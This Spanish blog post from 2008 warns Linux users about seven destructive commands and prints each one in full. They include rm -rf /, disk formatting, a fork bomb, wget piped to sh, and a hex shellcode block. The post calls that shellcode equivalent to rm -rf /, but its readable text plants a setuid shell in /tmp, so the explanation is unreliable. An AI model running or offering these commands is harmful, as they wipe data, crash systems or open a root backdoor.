Gracias por comentar.

Este Blog cuenta con detección automática de spam para los comentarios. Además, hasta que yo no los lea no se publicaran...

Buscar en este blog

sábado, 22 de noviembre de 2008

Comandos maliciosos en Linux

Linux tal vez no tenga virus (dicen que haberlos haylos), pero es posible ejecutar por ignorancia o despiste algún comando que nos traiga mas de un dolor de cabeza. Pensándolo bien, creo que esto puede pasar en cualquier sistema operativo...
Bueno, pues en Ubuntu Life han puesto unos cuantos de estos comandos que no es recomendable ejecutar o que debemos evitar ejecutar si están contenidos dentro de shell scripts (guiones de órdenes). También recomiendan que no hagamos el tipico Copy & Paste al tuntun y si nos bajamos algún script, lo editemos antes y miremos su contenido para evitar males mayores.

Algunos de esos comandos “peligrosos” son:


1. rm -rf /

Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendría a ser el equivalente (mas o menos) a un FORMAT C: en Windows.

2.

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.

3. mkfs.ext3 /dev/sda

Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).

4. :(){:|:&};:

Conocido también como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.

5. cualquier_comando > /dev/sda

Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.

6. wget http://alguna_url -O- | sh

Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podría ser contenido malicioso.

7. mv /home/tu_usuario/* /dev/null

Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).


Si alguno tiene ganas de probarlos, en su propio PC (por supuesto), que luego me cuente que paso...

Lo vi en: http://ubuntulife.wordpress.com/2008/11/21/7-comandos-maliciosos-para-linux-nunca-pero-nunca-los-ejecutes/

No hay comentarios: